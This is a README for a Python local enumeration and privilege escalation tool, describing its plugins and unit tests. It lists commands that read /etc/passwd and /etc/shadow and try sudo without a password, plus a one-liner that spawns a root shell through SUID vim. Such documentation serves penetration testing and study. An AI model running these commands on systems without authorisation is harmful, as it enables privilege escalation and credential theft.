ocLE4P
Table of contents
Introduction:
ocLE4P is a customizable Local Enumeration and Privilege Escalation tool based on Python. Everyone can write their own plugins by following the template files and including the plugins into the ocLE4P.py file. The enumeration plugins in mdcvxiv.py also support non-interactive shells. The non-interactive options give the user file with the output of the chosen enumeration.
What is Local Enumeration?
Local Enumeration is ordering in a list, specific assets of a system. That might be the running processes of the system, the version of the drivers, users of the system etc.
What is Privilege Escalation?
Privilege Escalation is escalating the rights of low privilege user to one with higher rights or root.
User documentation:
The project is based on Python 3. It contains a menu, "ocLE4P.py", from which, the user can choose the plugin he/she wants to use. If the file is run with an argument "-h" or "--help", the non-interactive enumeration options, will be displayed. The non-interactive interface is contained in "mdcvxiv.py" plugin.
Setup
Requirements for installation:
- Linux, BSD OS or Windows (Tested on Arch, Kali Linux, LXDE, Windows7, Debian)
- python3
- pip3 (dev mod)
- git (optional)
Once downloaded, the tool is ready for usage.
Usage
Run python3 ocLE4P.py
to open the menu or python3 ocLE4P.py -h
for non-interactive interface.
Unit Tests:
'mdcvxiv.py' test
Function | Test | Expected result |
---|---|---|
fileIn() | Open log file | True |
fileIn() | Check the functionality with simulated plugin | True |
interactive() | Pass incorect argument and chacks for "Incorrect argument!" | True |
interactive() | Pass two arguments and chacks for "Only one argument is required!" | True |
interactive() | Check is every available option printed | True |
interactive() | Open log file (insurance for correctly called function) | True |
interactive() | Chacks if the options are written | True |
TempFile().gen() | Checks if file is generated | True |
TempFile().gen() | Checks if file is deleted | True |
Plugin | Test | Expected result |
---|---|---|
All plugins | Checks is the plugin instance of plugins.Enumeration or plugin.PrivEsc | True |
All plugins | Checks is the plugin instance of plugins.Items | True |
All plugins | Checks is "Nick" is in plug.info() | True |
All Enumerations plugins | Checks is content len grater than 0 | True |
SysServUNIX | Is the output of "whoami" in content | True |
SysServUNIX | Is the output of "hostnamectl" in content | True |
SysServUNIX | Is the output of "echo $XDG_CURRENT_DESKTOP" in content | True |
SysServUNIX | Is the output of "systemctl list-units --type=service --state=running" in content | True |
SysServUNIX | Is the output of "systemctl list-units --type=service --all" in content | True |
SysServUNIX | Is the output of "systemctl list-unit-files" in content | True |
POPS_UNIX | Is the first line of "ps -eF grep root" in content | True |
POPS_UNIX | Is the first line of "ps -eF" in content | True |
POPS_UNIX | Is the error message of "netstat -antup" in content | True |
POPS_UNIX | Is the output of "cat /etc/passwd" in content | True |
POPS_UNIX | Is the output of "grep -v /etc/passwd" in content | True |
POPS_UNIX | Is the output of 'echo -e "$grpinfo" grep "(adm)"' in content | True |
POPS_UNIX | Is the output of "grep -v -E '^#' /etc/passwd awk -F: '$3 == 0 { print $1}'" in content | True |
POPS_UNIX | Is the error message of "grep -v -e '^$' /etc/sudoers grep -v '#'" in content | True |
POPS_UNIX | Is the error message of "ls -ahl /root/" in content | True |
POPS_UNIX | Is the error message of "echo '' sudo -S -l -k" in content | True |
SUID_check() | Is the output of SUID_check("vim") in "find / -perm -u=s -type f 2> /dev/null" | True |
SUID_check() | Is the output of SUID_check("grep") in "find / -perm -u=s -type f 2> /dev/null" | True |
SysServWIN | Is the output of "whoami" in content | True |
SysServWIN | Are th first 15 lines of "systeminfo" in content | True |
SysServWIN | Is the output of "sc queryex type= service" in content | True |
SysServWIN | Is the output of "sc queryex type= service state= all" in content | True |
SysServWIN | Is the output of "ls -ahl /root/" in content | True |
SysServWIN | Is the output of "sc queryex type= driver" in content | True |
Plugins:
mdcvxiv.py
<--------------ENUMERATION-------------->
All of the enumerations plugins support the non-interactive interface. This interface can be run on Linux and Windows. The options that are provided are:
python3 src/ocLE4P.py --linux-enumeration
Execute every plugin in 'mdcvxiv.py' for Linux enumeration. Write the output in log file.
python3 src/ocLE4P.py --linux-service-enumeration
Execute SysServUNIX plugin from 'mdcvxiv.py'. Plugin for local system services enumeration for Linux. Shows the current user, the host info + desktop environment, running services, all services and the unit files. Write the output in log file.
python3 src/ocLE4P.py --linux-pops-enumeration
Gets root processes+ALL. Shows the status of the open ports. Reads the content of /etc/passwd and checks for any hashes in it. Search for any in and root accounts. Trying to read /etc/sudoers and /etc/shadow. Trying sudo without a password. Write the output in log file.
python3 src/ocLE4P.py --win-enumeration
Execute every plugin in 'mdcvxiv.py' for Windows enumeration. Write the output in log file.
python3 src/ocLE4P.py --win-service-enumeration
Execute SysServWIN plugin from 'mdcvxiv.py'. Plugin for host info and host services enumeration. Write the output in log file.
SysServUNIX
Plugin for local system services enumeration for Linux Shows the current user, the host info + desktop environment, running services, all services and the unit files.
POPS_UNIX
Gets root processes+ALL. Shows the status of the open ports. Reads the content of /etc/passwd and checks for any hashes in it. Search for any in and root accounts. Trying to read /etc/sudoers and /etc/shadow. Trying sudo without a password.
SysServWIN
Plugin for host info and host services enumeration. Print the current user, system information, running processes, all processes and the drivers of the host.
<----------------PrivEsc---------------->
vim_UNIX
If vim has set SUID, the plugin tries to drop root shell by executing: ''' vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")' '''
grepSHADOW
If grep has set SUID, the plugin tries to read 'etc/shadow' file.